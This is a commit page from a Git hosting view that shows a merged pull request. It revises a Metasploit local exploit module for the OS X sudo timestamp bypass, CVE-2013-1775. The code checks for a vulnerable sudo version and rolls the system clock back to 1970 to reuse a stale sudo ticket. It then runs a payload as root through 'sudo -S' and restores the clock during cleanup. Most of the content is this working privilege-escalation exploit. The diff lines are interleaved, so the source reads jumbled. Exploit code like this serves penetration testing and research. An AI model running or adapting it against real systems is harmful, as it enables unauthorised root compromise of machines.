Merge pull request #2 from jvazquez-r7/test_osx

merge in @jvazquez-r7's fixes for osx sudo module
bug/bundler_fix
jvennix-r7 2013-08-23 17:06:26 -07:00
commit 155f336b6f
1 changed files with 87 additions and 31 deletions

View File

@ -37,32 +37,41 @@ class Metasploit3 < Msf::Exploit::Local
ran the sudo command. ran the sudo command.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => [ 'joev <jvennix[at]rapid7.com>'], 'Author' =>
'Platform' => [ 'osx' ],
'SessionTypes' => [ 'shell', 'meterpreter'],
'References' => [['CVE', '2013-1775']],
'Platform' => 'osx',
'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
'Targets' => [
[ [
'Mac OS X x86 (Native Payload)', { 'Todd C. Miller', # Vulnerability discovery
'joev <jvennix[at]rapid7.com>' # Metasploit module
],
'References' =>
[
['CVE', '2013-1775'],
['OSVDB', '90677']
],
'Platform' => 'osx',
'Arch' => [ ARCH_X86, ARCH_X86_64, ARCH_CMD ],
'SessionTypes' => [ 'shell', 'meterpreter'],
'Targets' => [
[ 'Mac OS X x86 (Native Payload)',
{
'Platform' => 'osx', 'Platform' => 'osx',
'Arch' => ARCH_X86 'Arch' => ARCH_X86
} }
], [ ],
'Mac OS X x64 (Native Payload)', { [ 'Mac OS X x64 (Native Payload)',
{
'Platform' => 'osx', 'Platform' => 'osx',
'Arch' => ARCH_X64 'Arch' => ARCH_X86_64
} }
], [ ],
'CMD', { [ 'CMD',
{
'Platform' => 'unix', 'Platform' => 'unix',
'Arch' => ARCH_CMD 'Arch' => ARCH_CMD
} }
] ]
], ],
'DefaultOptions' => { "PrependFork" => true }, 'DefaultTarget' => 0,
'DefaultTarget' => 0 'DisclosureDate' => 'Feb 28 2013'
)) ))
end end
@ -73,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Local
sudo_vn = $1 sudo_vn = $1
sudo_vn_parts = sudo_vn.split(/[\.p]/).map(&:to_i) sudo_vn_parts = sudo_vn.split(/[\.p]/).map(&:to_i)
# check vn between 1.6.0 through 1.7.10p6 # check vn between 1.6.0 through 1.7.10p6
# and 1.8.0 through 1.8.6p6 # and 1.8.0 through 1.8.6p6
if not vn_bt(sudo_vn, VULNERABLE_VERSION_RANGES) if not vn_bt(sudo_vn, VULNERABLE_VERSION_RANGES)
print_error "sudo version #{sudo_vn} not vulnerable." print_error "sudo version #{sudo_vn} not vulnerable."
return Exploit::CheckCode::Safe return Exploit::CheckCode::Safe
@ -84,8 +93,7 @@ class Metasploit3 < Msf::Exploit::Local
end end
if not user_in_admin_group? if not user_in_admin_group?
print_error "sudo version is vulnerable, but user is not in the "+ print_error "sudo version is vulnerable, but user is not in the admin group (necessary to change the date)."
"admin group (necessary to change the date)."
Exploit::CheckCode::Safe Exploit::CheckCode::Safe
end end
# one root for you sir # one root for you sir
@ -108,30 +116,48 @@ class Metasploit3 < Msf::Exploit::Local
print_status("Payload dropped and registered for cleanup") print_status("Payload dropped and registered for cleanup")
end end
print_status("Executing: #{SYSTEMSETUP_PATH} -gettime")
@time = cmd_exec("#{SYSTEMSETUP_PATH} -gettime").match(/^time: (.*)$/i)[1] @time = cmd_exec("#{SYSTEMSETUP_PATH} -gettime").match(/^time: (.*)$/i)[1]
print_status("Executing: #{SYSTEMSETUP_PATH} -getdate")
@date = cmd_exec("#{SYSTEMSETUP_PATH} -getdate").match(/^date: (.*)$/i)[1] @date = cmd_exec("#{SYSTEMSETUP_PATH} -getdate").match(/^date: (.*)$/i)[1]
print_status("Executing: #{SYSTEMSETUP_PATH} -getusingnetworktime")
@networked = cmd_exec("#{SYSTEMSETUP_PATH} -getusingnetworktime") =~ (/On$/) @networked = cmd_exec("#{SYSTEMSETUP_PATH} -getusingnetworktime") =~ (/On$/)
print_status("Executing: #{SYSTEMSETUP_PATH} -gettimezone")
@zone = cmd_exec("#{SYSTEMSETUP_PATH} -gettimezone").match(/^time zone: (.*)$/i)[1] @zone = cmd_exec("#{SYSTEMSETUP_PATH} -gettimezone").match(/^time zone: (.*)$/i)[1]
@network_server = if @networked @network_server = if @networked
print_status("Executing: #{SYSTEMSETUP_PATH} -getnetworktimeserver")
cmd_exec("#{SYSTEMSETUP_PATH} -getnetworktimeserver").match(/time server: (.*)$/i)[1] cmd_exec("#{SYSTEMSETUP_PATH} -getnetworktimeserver").match(/time server: (.*)$/i)[1]
end end
print_warning("Cleanup to be done in case something goes really bad")
print_warning("Execute: #{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}")
print_warning("Execute: #{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}")
print_warning("Execute: #{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}")
if @networked
print_warning("Execute: #{SYSTEMSETUP_PATH} -setusingnetworktime On")
if @network_server
print_warning("Execute: #{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
end
end
run_sudo_cmd run_sudo_cmd
end end
end end
def cleanup def cleanup
return if @_cleaning_up print_status("cleanup callback")
@_cleaning_up = true if not @_cleaning_up
@_cleaning_up = true
do_cleanup
end
super
end
print_status("Resetting system clock to original values") if @time def on_new_session(session)
cmd_exec("#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}") unless @zone.nil? print_status("on_new_session callback")
cmd_exec("#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}") unless @date.nil? if not @_cleaning_up
cmd_exec("#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}") unless @time.nil? @_cleaning_up = true
if @networked do_cleanup
cmd_exec("#{SYSTEMSETUP_PATH} -setusingnetworktime On")
unless @network_server.nil?
cmd_exec("#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
end
end end
super super
end end
@ -145,9 +171,17 @@ class Metasploit3 < Msf::Exploit::Local
['sudo', '-S', payload.encoded].join(' ') ['sudo', '-S', payload.encoded].join(' ')
end end
# to prevent the password prompt from destroying session # Ugly stuff just to test CMD tar isnt running because of the env variables not being preserved
sudo_cmd = 'echo "" | '+sudo_cmd_raw sudo_cmd_raw.gsub!(/python/, "/usr/bin/python")
sudo_cmd_raw.gsub!(/ruby/, "/usr/bin/ruby")
sudo_cmd_raw.gsub!(/sh/, "/bin/sh")
## to prevent the password prompt from destroying session
sudo_cmd = 'echo "" | ' + sudo_cmd_raw + ' & sleep 5'
print_status("Executing: sudo -k; \n"+
"#{SYSTEMSETUP_PATH} -setusingnetworktime Off -setdate 01:01:1970"+
" -settimezone GMT -settime 00:00")
cmd_exec( cmd_exec(
"sudo -k; \n"+ "sudo -k; \n"+
"#{SYSTEMSETUP_PATH} -setusingnetworktime Off -setdate 01:01:1970"+ "#{SYSTEMSETUP_PATH} -setusingnetworktime Off -setdate 01:01:1970"+
@ -166,6 +200,28 @@ class Metasploit3 < Msf::Exploit::Local
print_good output print_good output
end end
def do_cleanup
print_status("Resetting system clock to original values") if @time
print_status("Executing: #{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}")
cmd_exec("#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}") unless @zone.nil?
print_status("Executing: #{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}")
cmd_exec("#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}") unless @date.nil?
print_status("Executing: #{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}")
cmd_exec("#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}") unless @time.nil?
if @networked
print_status("Executing: #{SYSTEMSETUP_PATH} -setusingnetworktime On")
cmd_exec("#{SYSTEMSETUP_PATH} -setusingnetworktime On")
unless @network_server.nil?
print_status("Executing: #{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
cmd_exec("#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
end
end
end
# helper methods for accessing datastore # helper methods for accessing datastore
def using_native_target?; target.name =~ /native/i; end def using_native_target?; target.name =~ /native/i; end
def using_cmd_target?; target.name =~ /cmd/i; end def using_cmd_target?; target.name =~ /cmd/i; end